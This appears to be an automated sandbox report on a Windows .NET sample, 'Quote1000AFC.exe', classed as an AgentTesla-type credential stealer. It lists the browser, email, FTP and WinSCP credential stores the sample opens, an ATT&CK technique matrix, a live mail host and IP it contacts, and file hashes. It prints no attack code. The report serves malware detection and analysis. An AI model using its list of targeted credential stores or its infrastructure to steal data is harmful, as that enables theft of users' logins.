                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Users\user\Desktop\Quote1000AFC.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3f52a18.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Quote1000AFC.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2700732625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.2702375590.000000000316A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Quote1000AFC.exe PID: 5444, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.71a0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.71a0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1489117798.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Quote1000AFC.exe PID: 5444, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3f52a18.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Quote1000AFC.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2700732625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.2702375590.000000000316A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Quote1000AFC.exe PID: 5444, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.71a0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.71a0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1489117798.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPE
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        111
                        Process Injection
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        111
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        Credentials in Registry
                        1
                        Process Discovery
                        Remote Desktop Protocol11
                        Archive Collected Data
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                        Virtualization/Sandbox Evasion
                        Security Account Manager141
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares2
                        Data from Local System
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture11
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        File and Directory Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information
                        Cached Domain Credentials24
                        System Information Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Quote1000AFC.exe32%ReversingLabsByteCode-MSIL.Trojan.Redlinestealer
                        Quote1000AFC.exe43%VirustotalBrowse
                        Quote1000AFC.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        199.79.62.115
                        truefalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuote1000AFC.exe, 00000000.00000002.1481497304.0000000002D31000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://mail.mbarieservicesltd.comQuote1000AFC.exe, 00000004.00000002.2702375590.000000000316A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              199.79.62.115
                              mail.mbarieservicesltd.comUnited States
                              394695PUBLIC-DOMAIN-REGISTRYUSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562879
                              Start date and time:2024-11-26 08:23:48 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 42s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Quote1000AFC.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/6@3/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 29
                              • Number of non-executed functions: 6
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              02:24:48API Interceptor65x Sleep call for process: Quote1000AFC.exe modified
                              02:24:51API Interceptor19x Sleep call for process: powershell.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              199.79.62.115Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                  INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                    LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse
                                      1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                        Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                          TT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                              PO# 4507573387.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                PO-000041522.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  mail.mbarieservicesltd.comQuote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  TT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 199.79.62.115
                                                  24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PUBLIC-DOMAIN-REGISTRYUSshipping doc -GY298035826.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 162.251.80.30
                                                  New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.225
                                                  Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 199.79.63.24
                                                  Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 199.79.63.24
                                                  https://www.google.com.bn/url?snf=vpsBrmjsMjZT0YKBELze&nuu=B4grUxP5T5pV5xJiiFp0&sa=t&ndg=e2p4qPDSQqlwr77oflqr&pdbr=npO0StsDFHvGF7jwYfWY&np=slEjuRPdabbflvaXgHau&cb=IhzFYfcuqq5m2vva4DTH&url=amp%2Fbeutopiantech.com%2Fchd%2FroghgehdjtiE-SURECHDDam9lbC5kZW5vZnJpb0BoYW5lc2NvbXBhbmllcy5jb20=Get hashmaliciousUnknownBrowse
                                                  • 103.211.216.144
                                                  Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  DOCS.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 207.174.215.249
                                                  Ksciarillo_Reord_Adjustment.docxGet hashmaliciousUnknownBrowse
                                                  • 208.91.198.81
                                                  Ksciarillo_Reord_Adjustment.docxGet hashmaliciousUnknownBrowse
                                                  • 208.91.198.81
                                                  NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                  • 208.91.198.81
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\Quote1000AFC.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                  MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                  SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                  SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                  SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380747059108785
                                                  Encrypted:false
                                                  SSDEEP:48:lylWSU4y4RQmTpoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:lGLHyIFTmLgZ2KRHWLOug8s
                                                  MD5:762C5B1BA2884CB884F85A482FBA435D
                                                  SHA1:D4AF9380A674C7A2A6EEC41D0BED5EC4842A903E
                                                  SHA-256:824DD2CC08EEFF9B6146C0B53CF095E1125BD53B27607131C73E6287E35633E3
                                                  SHA-512:D706C1CF4DD13335F6FD07D3398C9A2B5DED533B2F7153B19768C18659E554852D6F2F1837A454FB12F2C370759251FC04743C274FDCD66A45F5D0A1C21EE193
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.69767851621143
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:Quote1000AFC.exe
                                                  File size:653'312 bytes
                                                  MD5:c8ea824fa0e80350b1412b84455e65fe
                                                  SHA1:80f1484aa4e4507df7d81ec5bb9ab32976419868
                                                  SHA256:2791c4da37ccfaabed34d36c65d373650dcfa6db4cc8f2990d671e1c01cd74df
